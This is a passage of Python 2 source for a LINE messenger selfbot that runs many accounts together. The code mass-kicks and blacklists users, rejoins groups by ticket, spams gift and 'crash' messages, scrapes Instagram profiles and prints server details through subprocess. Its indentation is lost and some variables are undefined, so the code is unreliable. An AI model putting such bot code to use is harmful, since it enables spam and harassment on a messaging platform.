print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
ke.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By:(☆─┅═ই╬BABANG ADHI☆)(2 s")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メ(☆─┅═ই╬Babang adhi☆")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if 'MENTION' in msg.contentMetadata.keys() != {'mid': mid}:
if wait["detect"] == True:
contact = cl.getContact(msg.from_)
cName = contact.displayName
balas = ["Paan sich tag mulu naksir ya.? ",cName + " ngapain ngetag?",cName + " Gak sah tag.Kalau ada perlu pc aja",cName + " Jones diLarang keras sebut² nama gue ヽ(^0^)ノ"]
ret_ = "[Auto Respond] \n\n" + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite:"," ")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'Mybot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#-----------------------------++++-----------------
#=======================================================
elif msg.text.lower() == "crash":
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': "u350cc7408cc6cc82e056ee046131f925"}
cl.sendMessage(msg)
#-----------------=============================
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
kt.sendMessage(msg)
#=================================================
#==================================================
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif msg.text.lower() == 'Allbio:':
if msg.from_ in owner:
string = msg.text.lower().replace("allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
cl.sendText(msg.to,"successfully turn it into: " + string + "")
elif "Bot1 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot1 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif 'instagram ' in msg.text.lower():
if msg.from_ in admin:
try:
instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'music ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
